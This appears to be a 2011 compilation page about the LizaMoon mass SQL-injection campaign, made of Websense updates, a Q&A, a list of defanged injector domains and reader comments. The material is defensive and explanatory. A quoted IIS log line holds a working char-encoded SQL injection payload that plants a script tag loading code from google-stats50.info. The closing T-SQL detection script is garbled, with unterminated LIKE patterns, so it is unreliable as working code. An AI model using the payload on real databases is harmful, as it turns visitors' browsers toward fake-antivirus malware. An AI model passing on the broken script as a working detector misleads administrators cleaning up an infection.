Video: LizaMoon in action
LizaMoon mass injection hits over 226,000 URLs (was 28,000)
Posted: 29 Mar 2011 10:15 AM
Websense Security Labs and the Websense Threatseeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.
UPDATE1: A
Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.
UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon.com.
UPDATE3: 500,000 hits at this time. It's growing.
Millions of Sites Hit with Mass-Injection Cyberattack
By Sarah Jacobsson Purewal, PCWorld Apr 1, 2011 6:21 AM
Hundreds of thousands -- and possibly millions -- of websites have been hit with a cyberattack that some are calling "one of the biggest mass-injection attacks we've ever seen."
Update on LizaMoon mass-injection and Q&A
The LizaMoon mass-injection campaign is still ongoing and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a
search on Google returns more than
1,500,000 results that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL or page, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down over time.
Update1: Now the google search returns 1,750,000
Additional injected URLs
Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).
hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://books-loader.info/ur.php
hxxp://google-stats73.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats50.info/ur.php
Jay Barnes said on Wednesday, March 30, 2011 11:54 AM
Also observed hxxp://lizamoon.com/ur.php containing javascript redirect to hxxp://system-scanner-uyxt.co.cc/scan1b/237?sessionId=05005504[...], which was already a dead hostname by the time user received redirect. Server that contained lizamoon.com reference for this user was hxxp://www.equusnow.com, which appears to be clean at the moment.
Similar (or identical) campaign may involve redirects to hxxp://system-scanner-eopa.co.cc containing fake-av. Another compromised server, hxxp://hccems.com/hr-adriana-lima-vogue-spain/, earlier today contained javascript code redirecting to system-scanner-eopa.co.cc only if the request used a google referer. That hccems.com page, with a google referer, currently redirects to hxxp://xz163v92.dyndns-ip.com/3/ (also fake-av).
Maye said on Wednesday, March 30, 2011 5:56 PM
This same attack is now happening with tadygus.com instead of lizamoon.
Antony said on Friday, April 01, 2011 10:44 AM
Just to be clear to those who actually know very little about database servers...a database server is not "vulnerable to SQL injection". Poorly-programmed and secured *applications* are vulnerable to SQL injection. It really annoys me to see databases blamed for poor application development practices.
Toyotawhizguy said on Friday, April 01, 2011 4:54 PM
You can block malicious sites by editing your "hosts" file using Notepad. For example, add the following line:
127.0.0.1 www.lizamoon.com #attack site 03/29/11
You can also list the site's IP address instead of the domain name:
127.0.0.1 95.64.9.18 #attack site 03/29/11
I maintain my "hosts" file as "read only" after editing, this protects it from malicious attacks.
Pete said on Saturday, April 02, 2011 12:11 PM
I am still confused by the SQL injection reference. Usually, an SQL injection is a vulnerability in an application which is then exploited for an persistent XSS or CSRF. What application has the SQL injection vulnerability? I get that RSS may pick up the persistent XSS but it has to get into a DB to start with and it can't get into a DB without an app. Which app has the vulnerability?
Arun: No answer found so far
Websense updated: 1st April 2011 12:16pm PT
The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.
Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.
Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. Initially we only received reports of users running Microsoft SQL Server 2000 and 2005 being hit but since then we have also received reports of websites using Microsoft SQL Server 2008 being injected as well.
Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2003 and 2005?
A: No. Everything points to that this is a vulnerability in a web application. We don't know which one(s) yet but SQL Injection attacks work by issuing SQL commands in unsanitized input to the server. That doesn't mean it's a vulnerability in the SQL Server itself, it means that the web application isn't filtering input from the user correctly.
Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.
Stakoverflow:
Here is an example of the value of the cs-uri-query field for one of the IIS log entries.
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.
SQL CODE TO IDENTIFY INFECTED TABLES AND COLUMNS
(Test & Working – Arun)
DECLARE c1 cursor for SELECT 'SELECT COUNT(*), '''+QUOTENAME(TABLE_SCHEMA)+'.'+QUOTENAME(TABLE_NAME)+''', '''+QUOTENAME(COLUMN_NAME)+''''+
' FROM ' + quotename(TABLE_SCHEMA) + '.'+QUOTENAME(TABLE_NAME) +
' WHERE ' + QUOTENAME(COLUMN_NAME) + ' LIKE ''%
FROM INFORMATION_SCHEMA.COLUMNS c
WHERE DATA_TYPE IN ('nvarchar', 'nchar', 'varchar', 'char', 'text', 'ntext')
and QUOTENAME(TABLE_NAME) not in (SELECT QUOTENAME(name)AS TABLE_NAME FROM sys.views)
order by QUOTENAME(TABLE_NAME);
DECLARE @CMD VARCHAR(200), @return varchar(10)
OPEN C1
FETCH NEXT FROM C1 INTO @CMD
WHILE @@FETCH_STATUS <> -1
BEGIN
declare @sql nvarchar(500), @tbl varchar(200), @col varchar(200)
set @sql = 'declare c2 cursor for ' + @CMD
exec sp_executesql @sql
open c2
FETCH NEXT FROM C2 INTO @return, @tbl, @col
WHILE @@FETCH_STATUS <> -1
BEGIN
if(@return > 0)
BEGIN
PRINT @return + ' records found in ' + @tbl + '.' + @col
exec('SELECT '+@col+' FROM '+@tbl+' WHERE '+@col+' LIKE ''%)
END
FETCH NEXT FROM C2 INTO @return, @tbl, @col
END
CLOSE C2
DEALLOCATE C2
FETCH NEXT FROM C1 INTO @CMD
END
CLOSE C1
DEALLOCATE C1
..I'll update if I found any news. Please share your experience and solutions.